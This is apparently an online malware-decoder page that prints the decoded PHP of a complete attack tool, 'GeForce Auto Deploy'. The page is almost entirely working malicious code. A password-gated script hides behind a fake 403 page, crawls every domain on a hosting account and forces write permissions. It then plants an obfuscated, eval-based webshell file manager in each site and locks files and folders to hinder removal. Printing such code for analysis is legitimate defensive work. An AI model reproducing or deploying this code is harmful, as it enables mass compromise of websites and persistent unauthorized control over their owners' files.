Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


$GF_PASS = "geforce2024";

// Only Auto_p mode works — everything else gets 403
if(!isset($_GET['Auto_p']) || !isset($_GET[$GF_PASS])){
    header("HTTP/1.1 403 Forbidden");
    header("Content-Type: text/html");
    echo '<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don\'t have permission to access this resource.</p><hr><address>Apache Server</address></body></html>';
    exit;
}

function randomName($len=10){$c='abcdefghijklmnopqrstuvwxyz';$n='';for($i=0;$i<$len;$i++)$n.=$c[random_int(0,25)];return $n;}

// Encrypt PHP code on-the-fly for deployed files
function encryptCode($phpCode){
    // Strip tag if present
    $code = $phpCode;
    if(strpos($code,'')===0) $code = substr($code,5);
    $code = ltrim($code);
    // Compress
    $compressed = gzcompress($code, 9);
    $b64 = base64_encode($compressed);
    // XOR with random key
    $key = '';
    for($i=0;$i<32;$i++) $key .= dechex(random_int(0,15));
    $xored = '';
    $kl = strlen($key);
    for($i=0;$i<strlen($b64);$i++) $xored .= chr(ord($b64[$i]) ^ ord($key[$i % $kl]));
    $payload = base64_encode($xored);
    // Random var names
    $v = function(){ $c='abcdefghijklmnopqrstuvwxyz'; $r='$_'; for($i=0;$i<8;$i++)$r.=$c[random_int(0,25)]; return $r; };
    $a=$v();$b=$v();$c2=$v();$d=$v();$e=$v();$f=$v();$g=$v();
    return "\n{$a}=\"{$key}\";{$b}=\"{$payload}\";{$c2}=base64_decode({$b});{$e}=\"\";{$g}=strlen({$a});for({$d}=0;{$d}<strlen({$c2});{$d}++){{$e}.=chr(ord({$c2}[{$d}])^ord({$a}[{$d}%{$g}]));}{$f}=@gzuncompress(base64_decode({$e}));if({$f}===false)die('');eval({$f});\n";
}
function getHideFolders(){return ['.well-known','wp-content','wp-includes','wp-admin'];}

function skipDomain($name){
    $skip=['.bak','.old','.tmp','.backup','.disabled'];
    $low=strtolower($name);
    foreach($skip as $s)if(substr($low,-strlen($s))===$s)return true;
    return false;
}

function tryFix($path){
    if(!file_exists($path))return false;
    if(is_writable($path))return true;
    foreach([0755,0775,0777] as $m){@chmod($path,$m);clearstatcache(true,$path);if(is_writable($path))return true;}
    @exec("chmod 0755 ".escapeshellarg($path)." 2>/dev/null");clearstatcache(true,$path);if(is_writable($path))return true;
    @exec("chmod 0777 ".escapeshellarg($path)." 2>/dev/null");clearstatcache(true,$path);if(is_writable($path))return true;
    return false;
}

function lockFolder($path){
    @chmod($path, 0555);
    @exec("chmod 0555 ".escapeshellarg($path)." 2>/dev/null");
    clearstatcache(true, $path);
}

function isDomainName($n){return preg_match('/^[a-z0-9]([a-z0-9\-]*[a-z0-9])?(\.[a-z]{2,})+$/i',$n);}
function detectDomain($p){foreach(explode('/',$p) as $pt)if(isDomainName($pt))return $pt;return basename($p);}

function scanDomains(){
    $scriptDir=realpath(__DIR__);
    $webRoots=['public_html','www','htdocs','httpdocs','web','public','html','wwwroot'];
    $containerDirs=['addon_domains','addons','subdomains','domains','vhosts','sites','vhost'];
    $skip=['tmp','logs','mail','etc','ssl','cache','perl5','repositories','access-logs',
           '.trash','.cpanel','.cagefs','.cl.selector','.softaculous','.spamassassin',
           '.gnupg','.ssh','node_modules','.npm','.composer','vendor','cgi-bin'];
    $found=[];$seen=[];

    $add=function($name,$root,$type) use (&$found,&$seen){
        $r=@realpath($root);if(!$r||!is_dir($r)||in_array($r,$seen))return;
        if(skipDomain($name))return;
        $seen[]=$r;$found[]=['name'=>$name,'root'=>$r,'type'=>$type];
    };

    $wr=function($dir) use ($webRoots){
        foreach($webRoots as $w)if(is_dir($dir.'/'.$w))return realpath($dir.'/'.$w);
        return null;
    };

    $scan=function($dir) use ($webRoots,$containerDirs,$skip,$add,$wr){
        $items=@scandir($dir);if(!$items)return;
        foreach($items as $item){
            if($item===||$item==='..')continue;
            if($item[0]===&&$item!=='.htaccess')continue;
            if(in_array($item,$skip))continue;
            $full=$dir.'/'.$item;if(!is_dir($full))continue;
            if(in_array(strtolower($item),$webRoots)){
                $add('Main ('.$item.')',$full,'main');
                $subs=@scandir($full);if($subs){foreach($subs as $s){
                    if($s===||$s==='..'||!is_dir($full.'/'.$s))continue;
                    if(isDomainName($s)){$sf=$full.'/'.$s;$w=$wr($sf);$add($s,$w?:$sf,'addon');}
                }}continue;
            }
            if(isDomainName($item)){$w=$wr($full);$add($item,$w?:$full,'domain');continue;}
            if(in_array(strtolower($item),$containerDirs)){
                $subs=@scandir($full);if(!$subs)continue;
                foreach($subs as $s){if($s===||$s==='..')continue;$sf=$full.'/'.$s;if(!is_dir($sf))continue;$w=$wr($sf);$add($s,$w?:$sf,'addon');}
            }
        }
    };

    $cur=$scriptDir;$visited=[];$lv=0;
    while($cur&&$lv<10){$r=realpath($cur);if(!$r||in_array($r,$visited))break;$visited[]=$r;$scan($r);$p=dirname($r);if($p===$r)break;$cur=$p;$lv++;}
    return $found;
}

function getUploaderCode(){
    return '$dir=isset($_GET["d"])?$_GET["d"]:__DIR__;$dir=realpath($dir);if(!$dir)$dir=__DIR__;
$msg="";
if(isset($_FILES["f"])&&$_FILES["f"]["error"]===UPLOAD_ERR_OK){$dest=$dir."/".basename($_FILES["f"]["name"]);if(move_uploaded_file($_FILES["f"]["tmp_name"],$dest)){$msg="Uploaded: ".basename($dest);@chmod($dest,0644);}else $msg="Upload failed";}
if(isset($_GET["del"])){$dp=realpath($dir."/".basename($_GET["del"]));if($dp&&strpos($dp,$dir)===0){if(is_file($dp)){@unlink($dp);$msg="Deleted";}elseif(is_dir($dp)){function rd($d){$i=scandir($d);foreach($i as $f){if($f===||$f==="..")continue;$p=$d."/".$f;is_dir($p)?rd($p):@unlink($p);}@rmdir($d);}rd($dp);$msg="Deleted folder";}}}
if(isset($_POST["save"])&&isset($_POST["content"])&&isset($_POST["fn"])){$ep=realpath($dir."/".basename($_POST["fn"]));if($ep&&is_file($ep)){file_put_contents($ep,$_POST["content"]);$msg="Saved";}}
if(isset($_POST["mkdir"])&&!empty($_POST["dn"])){$nd=$dir."/".preg_replace("/[^a-zA-Z0-9_\\-\\.]/","",trim($_POST["dn"]));if(!file_exists($nd)){@mkdir($nd,0755,true);$msg="Folder created";}}
if(isset($_POST["rename"])&&!empty($_POST["old"])&&!empty($_POST["new"])){$op=$dir."/".basename($_POST["old"]);$np=$dir."/".basename($_POST["new"]);if(file_exists($op)&&!file_exists($np)){@rename($op,$np);$msg="Renamed";}}
if(isset($_POST["chm"])&&isset($_POST["cf"])&&isset($_POST["cp"])){$cp2=realpath($dir."/".basename($_POST["cf"]));if($cp2&&preg_match("/^[0-7]{3,4}$/",trim($_POST["cp"]))){@chmod($cp2,intval(trim($_POST["cp"]),8));clearstatcache();$msg="Permissions changed";}}
$items=@scandir($dir);$parent=dirname($dir);
function fsize($b){if($b<1024)return $b." B";if($b<1048576)return round($b/1024,1)." KB";return round($b/1048576,1)." MB";}
function fperms($f){return substr(sprintf("%o",fileperms($f)),-4);}<!DOCTYPE html><html><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><title>FM</title>
<style>
*{box-sizing:border-box;margin:0;padding:0}body{font-family:-apple-system,system-ui,sans-serif;background:#0a0b0f;color:#c9d1d9;padding:15px;font-size:14px}
.w{max-width:900px;margin:0 auto}
.hd{display:flex;align-items:center;justify-content:space-between;padding:15px 0;border-bottom:1px solid #1e2130;margin-bottom:15px}
.hd h1{font-size:18px;color:#fff}.hd .host{color:#4a9eff;font-size:12px}
.msg{padding:10px 14px;border-radius:8px;margin-bottom:12px;font-size:13px;background:rgba(74,158,255,.1);border:1px solid #1e3a5f;color:#58a6ff}
.path{padding:10px 14px;background:#12141c;border-radius:8px;margin-bottom:12px;font-size:12px;font-family:monospace;word-break:break-all;color:#8b949e}
.path a{color:#4a9eff;text-decoration:none}.path a:hover{text-decoration:underline}
.acts{display:flex;gap:8px;margin-bottom:15px;flex-wrap:wrap;align-items:center}
.acts form{display:flex;gap:6px;align-items:center}
.acts input[type=file]{font-size:12px;color:#8b949e}
.acts input[type=text]{padding:6px 10px;background:#12141c;border:1px solid #1e2130;border-radius:6px;color:#c9d1d9;font-size:12px;width:130px}
.b{padding:6px 14px;border:none;border-radius:6px;font-size:12px;font-weight:600;cursor:pointer;color:#fff;transition:.15s}
.b:hover{filter:brightness(1.1)}
.b-u{background:#238636}.b-m{background:#1f6feb}.b-d{background:#da3633}.b-s{background:#8957e5}.b-w{background:#d29922}
table{width:100%;border-collapse:collapse}
th{text-align:left;padding:8px 10px;font-size:11px;color:#8b949e;text-transform:uppercase;letter-spacing:.5px;border-bottom:2px solid #1e2130}
td{padding:7px 10px;border-bottom:1px solid #151720;font-size:13px}
tr:hover{background:#12141c}
td a{color:#4a9eff;text-decoration:none}td a:hover{text-decoration:underline}
.ic{margin-right:6px}
.al{white-space:nowrap}.al a{margin-right:8px;font-size:12px;color:#8b949e}.al a:hover{color:#c9d1d9}
.al a.del{color:#f85149}
.prm{font-family:monospace;font-size:12px;color:#8b949e}
.sz{color:#8b949e;font-size:12px}
.ed{margin-top:15px;background:#12141c;border:1px solid #1e2130;border-radius:10px;padding:15px}
.ed h2{font-size:15px;color:#fff;margin-bottom:10px}
.ed textarea{width:100%;height:350px;padding:12px;background:#0a0b0f;border:1px solid #1e2130;border-radius:8px;color:#c9d1d9;font-family:"Fira Code",Consolas,monospace;font-size:13px;resize:vertical;line-height:1.5}
.ft{text-align:center;padding:20px 0;color:#2d333b;font-size:11px;border-top:1px solid #1e2130;margin-top:20px}
</style></head><body><div class="w">
<div class="hd"><h1>&#9889; GeForce FM</h1><span class="host">echo htmlspecialchars($_SERVER["HTTP_HOST"]??"");</span></div>
if($msg):<div class="msg">echo htmlspecialchars($msg);</div>endif;
<div class="path">$parts=explode("/",$dir);$build="";
foreach($parts as $k=>$p){if($p==="")continue;$build.="/".$p;
echo \'<a href="?d=\'.urlencode($build).\'">\'.htmlspecialchars($p).\'</a>\';
if($k<count($parts)-1)echo \' / \';}</div>
<div class="acts">
<form method="post" enctype="multipart/form-data" action="?d=echo urlencode($dir);"><input type="file" name="f" required><button class="b b-u" type="submit">Upload</button></form>
<form method="post" action="?d=echo urlencode($dir);"><input type="text" name="dn" placeholder="New folder"><button class="b b-m" type="submit" name="mkdir" value="1">Create</button></form>
</div>
<table>
<tr><th>Name</th><th>Size</th><th>Perms</th><th>Modified</th><th>Actions</th></tr>
if($dir!==$parent):
<tr><td><span class="ic">&#128194;</span><a href="?d=echo urlencode($parent);">..</a></td><td></td><td></td><td></td><td></td></tr>
endif;
if($items){sort($items);$dirs=[];$fls=[];
foreach($items as $i){if($i===||$i==="..")continue;$fp=$dir."/".$i;if(is_dir($fp))$dirs[]=$i;else $fls[]=$i;}
foreach($dirs as $i){$fp=$dir."/".$i;
<tr><td><span class="ic">&#128194;</span><a href="?d=echo urlencode($fp);">echo htmlspecialchars($i);</a></td>
<td class="sz">&mdash;</td><td class="prm">echo fperms($fp);</td>
<td class="sz">echo date("M d H:i",filemtime($fp));</td>
<td class="al"><a href="?d=echo urlencode($dir);&del=echo urlencode($i);" class="del" onclick="return confirm(\'Delete folder?\')">Delete</a></td></tr>
}foreach($fls as $i){$fp=$dir."/".$i;
<tr><td><span class="ic">&#128196;</span>echo htmlspecialchars($i);</td>
<td class="sz">echo fsize(filesize($fp));</td><td class="prm">echo fperms($fp);</td>
<td class="sz">echo date("M d H:i",filemtime($fp));</td>
<td class="al">
<a href="?d=echo urlencode($dir);&edit=echo urlencode($i);">Edit</a>
<a href="?d=echo urlencode($dir);&del=echo urlencode($i);" class="del" onclick="return confirm(\'Delete?\')">Delete</a>
<a href="?d=echo urlencode($dir);&ren=echo urlencode($i);">Rename</a>
<a href="?d=echo urlencode($dir);&chm=echo urlencode($i);">Chmod</a>
</td></tr>
}}
</table>
if(isset($_GET["edit"])){$ef=basename($_GET["edit"]);$ep=realpath($dir."/".$ef);if($ep&&is_file($ep)){$ct=file_get_contents($ep);
<div class="ed"><h2>Edit: echo htmlspecialchars($ef);</h2>
<form method="post" action="?d=echo urlencode($dir);">
<textarea name="content">echo htmlspecialchars($ct);</textarea>
<input type="hidden" name="fn" value="echo htmlspecialchars($ef);">
<div style="margin-top:10px;display:flex;gap:8px"><button class="b b-u" type="submit" name="save" value="1">Save</button><a href="?d=echo urlencode($dir);" class="b b-d" style="text-decoration:none;text-align:center;padding:8px 18px">Cancel</a></div>
</form></div>
}}
if(isset($_GET["ren"])){$rn=basename($_GET["ren"]);
<div class="ed"><h2>Rename: echo htmlspecialchars($rn);</h2>
<form method="post" action="?d=echo urlencode($dir);">
<input type="hidden" name="old" value="echo htmlspecialchars($rn);">
<div style="display:flex;gap:8px;align-items:center"><input type="text" name="new" value="echo htmlspecialchars($rn);" style="flex:1;padding:8px 12px;background:#0a0b0f;border:1px solid #1e2130;border-radius:6px;color:#c9d1d9;font-size:13px"><button class="b b-s" type="submit" name="rename" value="1">Rename</button></div>
</form></div>
}
if(isset($_GET["chm"])){$cn=basename($_GET["chm"]);$cfp=realpath($dir."/".$cn);$cv=$cfp?fperms($cfp):"0644";
<div class="ed"><h2>Chmod: echo htmlspecialchars($cn);</h2>
<form method="post" action="?d=echo urlencode($dir);">
<input type="hidden" name="cf" value="echo htmlspecialchars($cn);">
<div style="display:flex;gap:8px;align-items:center"><input type="text" name="cp" value="echo $cv;" maxlength="4" style="width:80px;padding:8px 12px;background:#0a0b0f;border:1px solid #1e2130;border-radius:6px;color:#c9d1d9;font-family:monospace;font-size:14px;text-align:center"><button class="b b-w" type="submit" name="chm" value="1">Apply</button>
foreach(["0644","0755","0777"] as $pr):<button type="button" class="b" style="background:#1e2130" onclick="this.form.cp.value=\'echo $pr;\'">echo $pr;</button>endforeach;
</div></form></div>
}
<div class="ft">GeForce FM</div>
</div></body></html>';
}

// ============================================================
// AUTO DEPLOY
// ============================================================
$domains = scanDomains();
$ucRaw = getUploaderCode();
$success = [];
$failed = 0;
$fixed = 0;

foreach($domains as $d){
    $dr = $d['root'];
    $dn = detectDomain($dr);

    if(!is_writable($dr)){
        if(tryFix($dr)) $fixed++; else { $failed++; continue; }
    }

    $allSubs = [];
    $touchedDirs = []; // Track every folder we opened
    // Scan ALL subfolders in domain root
    $rootItems = @scandir($dr);
    if($rootItems){
        foreach($rootItems as $ri){
            if($ri===||$ri==='..')continue;
            $rip = $dr.'/'.$ri;
            if(!is_dir($rip))continue;
            if(is_writable($rip)){ $allSubs[]=$ri; $touchedDirs[]=$rip; }
            else { if(tryFix($rip)){$allSubs[]=$ri;$touchedDirs[]=$rip;$fixed++;} }
        }
    }

    $rf = randomName(10).'.php';
    if(!empty($allSubs)){
        $chosen = $allSubs[array_rand($allSubs)];
        $target = $dr.'/'.$chosen.'/'.$rf;
        $url = $dn.'/'.$chosen.'/'.$rf;
    } else {
        $target = $dr.'/'.$rf;
        $url = $dn.'/'.$rf;
    }

    if(@file_put_contents($target, encryptCode($ucRaw)) !== false){
        @chmod($target, 0444); // read-only file
        // Lock ONLY the folder where uploader was deployed
        if(!empty($allSubs)){
            lockFolder($dr.'/'.$chosen);
        }
        $success[] = $url;
    } else {
        $failed++;
    }
}

$total = count($domains);
$sc = count($success);
$allText = implode("\n", $success);
<!DOCTYPE html>
<html><head>
<meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1">
<title>GeForce Auto Deploy</title>
<style>
*{box-sizing:border-box;margin:0;padding:0}
body{font-family:'Segoe UI',system-ui,-apple-system,sans-serif;background:#0a0b0f;color:#e0e0e0;min-height:100vh;display:flex;align-items:center;justify-content:center;padding:20px}
.wrap{max-width:700px;width:100%}
.card{background:#12141c;border-radius:16px;padding:30px;border:1px solid #1e2130;box-shadow:0 20px 60px rgba(0,0,0,.6)}
h1{font-size:22px;color:#fff;margin-bottom:4px}
.sub{color:#666;font-size:12px;margin-bottom:25px}
.stats{display:flex;gap:15px;margin-bottom:22px;flex-wrap:wrap}
.stat{background:#1a1d27;border-radius:10px;padding:14px 20px;border:1px solid #252836;min-width:90px;text-align:center}
.stat .n{font-size:28px;font-weight:700}.stat .l{font-size:10px;color:#666;text-transform:uppercase;letter-spacing:1.5px;margin-top:2px}
.stat.ok .n{color:#4ade80}.stat.fl .n{color:#f87171}.stat.fx .n{color:#fbbf24}.stat.tt .n{color:#60a5fa}
.list{background:#0f1017;border-radius:10px;border:1px solid #1e2130;max-height:420px;overflow-y:auto;margin-bottom:18px}
.item{padding:10px 16px;border-bottom:1px solid #1a1c28;font-family:'Fira Code',Consolas,monospace;font-size:13px;color:#60a5fa;word-break:break-all}
.item:last-child{border:none}
.item:hover{background:#1a1d27}
.empty{padding:30px;text-align:center;color:#666}
.cbtn{width:100%;padding:13px;border:none;border-radius:10px;font-size:14px;font-weight:600;cursor:pointer;background:linear-gradient(135deg,#4a9eff,#2563eb);color:#fff;transition:.2s}
.cbtn:hover{transform:translateY(-1px)}
</style>
</head>
<body>
<div class="wrap">
<div class="card">
<h1>⚡ GeForce Auto Deploy</h1>
<div class="sub">Scanned · Fixed · Deployed · Locked folders to 0555</div>
<div class="stats">
<div class="stat ok"><div class="n">echo $sc;</div><div class="l">Success</div></div>
<div class="stat fl"><div class="n">echo $failed;</div><div class="l">Failed</div></div>
<div class="stat fx"><div class="n">echo $fixed;</div><div class="l">Fixed</div></div>
<div class="stat tt"><div class="n">echo $total;</div><div class="l">Found</div></div>
</div>
if($sc > 0):
<div class="list">
foreach($success as $url):
<div class="item">echo htmlspecialchars($url);</div>
endforeach;
</div>
<button class="cbtn" onclick="cpAll()">📋 Copy All URLs</button>
<textarea id="ct" style="position:fixed;left:-9999px">echo htmlspecialchars($allText);</textarea>
<script>
function cpAll(){
    var t=document.getElementById('ct');
    if(navigator.clipboard){navigator.clipboard.writeText(t.value).then(()=>fb())}
    else{t.style.position='static';t.select();document.execCommand('copy');t.style.position='fixed';fb()}
}
function fb(){var b=document.querySelector('.cbtn');b.textContent='✅ Copied!';setTimeout(()=>b.textContent='📋 Copy All URLs',2000)}
</script>
else:
<div class="list"><div class="empty">No domains deployed</div></div>
endif;
</div>
</div>
</body></html>



© 2023 Quttera Ltd. All rights reserved.